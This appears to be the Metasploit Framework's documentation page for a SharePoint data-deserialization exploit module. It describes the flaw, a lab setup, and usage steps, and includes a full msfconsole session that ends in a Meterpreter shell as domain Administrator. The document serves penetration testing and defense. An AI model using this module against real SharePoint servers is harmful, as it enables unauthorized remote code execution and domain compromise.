ContextQMD
Back to Metasploit Framework

Sharepoint Data Deserialization

documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md

6.4.1315.3 KB
Original Source

Vulnerable Application

A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated attacker to execute code within the context of the SharePoint application service. The privileges in this execution context are determined by the account that is specified when SharePoint is installed and configured. The vulnerability is related to a failure to validate the source of XML input data, leading to an unsafe deserialization operation that can be triggered from a page that initializes either the ContactLinksSuggestionsMicroView type or a derivative of it. In a default configuration, a Domain User account is sufficient to access SharePoint and exploit this vulnerability.

This module leverages the /_layouts/15/quicklinks.aspx?Mode=Suggestion endpoint that was confirmed to be vulnerable by Soroush Dalili. Alternative endpoints that instantiate the ContactLinksSuggestionsMicroView type may be used as well but are not supported by the module.

Configuring SharePoint

Once SharePoint is installed, it needs to be configured with a site in order to be exploitable. The Central Administration web interface is not vulnerable. To configure SharePoint to be a stand alone server:

  1. Install Active Directory and promote the server to be a Domain Controller
    1. Install the "Active Directory Domain Services" role
    2. Promote the server to a Domain Controller in a new forest
    3. Create a Domain User account for testing
  2. Install SQL Server Express
  3. Run the "SharePoint Products Configuration Wizard"
    1. Use the SQL Server Express instances as the database server
  4. In the SharePoint "Central Administration" console web interface:
    1. Verify that there is a web application under the "Manage web applications" page
    2. Create a new "Site Collection" under the "Create site collections" page
      1. Select the previously created web application
      2. Set a Title
      3. Use the default "Team Site" template
      4. Set the "Primary Site Collection Administrator" to the Domain Administrator account

Verification Steps

  1. Install the application and ensure a page is accessible
  2. Start msfconsole
  3. Do: use exploit/windows/http/sharepoint_data_deserialization
  4. Set the RHOSTS, USERNAME, PASSWORD and PAYLOAD options
  5. Set any additional options as required by the previously selected payload
  6. Optionally set the VHOST, SSL and DOMAIN options as appropriate
  7. Run the exploit

Options

Scenarios

SharePoint 2016 on Server 2016

msf > use exploit/windows/http/sharepoint_data_deserialization 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168
RHOSTS => 192.168.63.168
msf exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80
RPORT => 80
msf exploit(windows/http/sharepoint_data_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v
VHOST => ec2amaz-v2pri0v
msf exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre
USERNAME => smcintyre
msf exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1
PASSWORD => Password1
msf exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT
DOMAIN => SHRPNT
msf exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(windows/http/sharepoint_data_deserialization) > check
[*] 192.168.63.168:80 - The service is running, but could not be validated. Received the quicklinks HTML form.
msf exploit(windows/http/sharepoint_data_deserialization) > exploit

[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. Received the quicklinks HTML form.
[*] Command Stager progress -   7.42% done (7499/101079 bytes)
[*] Command Stager progress -  14.84% done (14998/101079 bytes)
[*] Command Stager progress -  22.26% done (22497/101079 bytes)
[*] Command Stager progress -  29.68% done (29996/101079 bytes)
[*] Command Stager progress -  37.09% done (37495/101079 bytes)
[*] Command Stager progress -  44.51% done (44994/101079 bytes)
[*] Command Stager progress -  51.93% done (52493/101079 bytes)
[*] Command Stager progress -  59.35% done (59992/101079 bytes)
[*] Command Stager progress -  66.77% done (67491/101079 bytes)
[*] Command Stager progress -  74.19% done (74990/101079 bytes)
[*] Command Stager progress -  81.61% done (82489/101079 bytes)
[*] Command Stager progress -  89.03% done (89988/101079 bytes)
[*] Command Stager progress -  96.45% done (97487/101079 bytes)
[*] Command Stager progress - 100.00% done (101079/101079 bytes)
[*] Started bind TCP handler against 192.168.63.168:4444
[*] Sending stage (176195 bytes) to 192.168.63.168
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.63.168:4444) at 2020-07-29 11:45:13 -0400

meterpreter > sysinfo
Computer        : EC2AMAZ-V2PRI0V
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : SHRPNT
Logged On Users : 19
Meterpreter     : x86/windows
meterpreter > getuid
Server username: SHRPNT\Administrator
meterpreter >